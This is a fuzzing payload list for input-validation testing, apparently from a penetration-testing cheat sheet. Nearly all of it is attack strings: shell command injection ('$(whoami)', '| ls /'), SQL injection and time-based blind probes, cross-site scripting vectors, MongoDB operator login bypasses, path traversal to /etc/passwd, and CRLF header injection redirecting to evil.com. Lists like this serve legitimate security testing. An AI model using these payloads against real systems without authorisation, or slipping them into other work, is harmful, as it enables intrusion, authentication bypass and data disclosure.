Input Validation - Fuzz1
Quick testing payloads for input validation and data processing
Payloads
true
false
null
1
2
0
-10
id
;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)
!
!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
"
" OR "" = "
" OR 1 = 1 -- -
" or benchmark(10000000,MD5(1))#
" or pg_sleep(5)--
" or sleep(5)#
" or sleep(5)="
""
")
") or benchmark(10000000,MD5(1))#
") or pg_sleep(5)--
") or sleep(5)="
"))
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(5)--
")) or sleep(5)="
"));waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
"><svg onload=alert(1)>
"onmouseover="alert(1)
#
$
$where: '1 == 1'
%
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0D%0ASet-Cookie:test2=test;domain=evil.com
%0a
%0b
%0c
%0d
%0d%0a
%0d%0aLocation:%20http://example.com
%0d%0aLocation:%20https://evil.com
%0e
%0f
%10
%11
%12
%13
%14
%15
%16
%17
%18
%19
%1a
%1b
%1c
%1d
%1e
%1f
%22
%2500
%250d%250a
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd
%27
%2c(select%20*%20from%20(select(sleep(10)))a)
%3B
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%E5%98%8A
%E5%98%8A%E5%98%8DSet-Cookie:%20test
%E5%98%8D
%E5%98%8D%E5%98%8AContent-Type:text/html%0d%0a
&
&
�
�
'-alert(1)-'
javascriptΪlert(1)
'-alert(1)-'
'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
' AND id IS NULL; --
' GROUP BY columnnames having 1=1 --
' OR '' = '
' OR '1
' OR 'x'='x
' OR 1 -- -
' OR 1=1--
' UNION SELECT sum(columnname ) from tablename --
' or "
' or benchmark(10000000,MD5(1))#
' or pg_sleep(5)--
' or sleep(5)#
' or sleep(5)='
' } ], $comment:'successful MongoDB injection'
'"\/$[].>
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
''
'''''''''''''UNION SELECT '2
'';! - "<XSS>=&{()}
')
') or benchmark(10000000,MD5(1))#
') or pg_sleep(5)--
') or sleep(5)='
'))
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(5)--
')) or sleep(5)='
'));waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
', $or: [ {}, { 'a':'a
', $where: '1 == 1
'-alert(1)-'
'; return '' == '
';-alert(1)//
';WAITFOR DELAY '0:0:30'--
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';sleep(5000);
';waitfor delay '0:0:5'--
'='
'=0--+
'LIKE'
'}alert(1)%0A{'
'}alert(1);{'
(
)
));waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
*
+
,
, $where: '1 == 1'
,(select * from (select(sleep(10)))a)
-
-- or #
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
-1' UNION SELECT 1,2,3--+
-2
.
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
/
/
/%0d%0aLocation:%20http://example.com
//
//
/C:/Windows/win.ini
/etc/passwd
0x00
0x0a
1 or 1=1 --
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1 or sleep(5)#
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
1' ORDER BY 1,2,3--+
1' ORDER BY 1,2--+
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' or 1=1 --
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(5)--
1) or sleep(5)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(5)--
1)) or sleep(5)#
1*56
1, $where: '1 == 1'
1-false
1-true
:
;
;sleep(100);
;waitfor delay '0:0:5'--
<
<%00script>alert(5)</script>
<<script>alert("XSS");//<</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<iframe src="javascript:alert(1)">
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<img src=x onerror=alert(7) />
<img/src=x a='' onerror=alert(8)>
<scr\x00ipt>alert(1)</scr\x00ipt>
<script ///Note the newline
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script>\u0061lert(2)</script>
<script>\u{0000000061}lert(4)</script>
<script>\u{61}lert(3)</script>
<script>al%00ert(6)</script>
<script>alert(1)</script>
<svg %09onload%20=alert(1)>
<svg %09onload=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
<svg onload%09=alert(1)> //No safari
<svg onload=alert('XSS')>
<svg onload=alert(1)>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<svg/onload=alert``>
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg><x><script>alert('1')</x>
=
>
>alert(1)</script>
?
AND 0
AND 1
AND false
AND true
C:/Windows/win.ini
JavaSCript:alert(1)
[
[$ne]=1
\
\"
\"-alert(1)}//
\'-alert(1)//
\';alert(1)//
\'}alert(1);{//
\0
\000
\\
\b
\e
\f
\n
\r
\r\n
\t
\u0000
\x00
\x0a
\x0d
\x0d\x0a
\z
]
^
_
`
`)
`))
``
alert`xss`;
benchmark(10000000,MD5(1))#
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript:alert(1)
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
null
onerror=alert`1`
param=abc`;return+false});});alert`xss`;</script>
pg_sleep(5)--
return+false});
script x>
sleep(5)#
true, $where: '1 == 1'
username[$ne]=1&password[$ne]=1
username[$ne]=toto&password[$ne]=toto
{
{ $ne: 1 }
{"$and": [ {"id": 5}, {"id": 6} ]}
{"$in": []}
{"$ne": -1}
{"$or": [{"user": "foo"}, {"user": "realuser"}]
{"$or": [{},{"foo":"1"}]}
{"$where": "return true"}
{"$where": "sleep(100)"}
{"user": "nullsweep"}
{"user": ["nullsweep", "foo"]}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username":{"$in":["Administrator","Admin", "admin", "root", "administrator"]},"password":{"$gt":""}}
{$gt: ''}
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}
|
||
|| 1==1
|| 1==1%00
|| 1==1//
}
});
}, { password : /.*/ }
~
’
”
OR 1=1
Last updated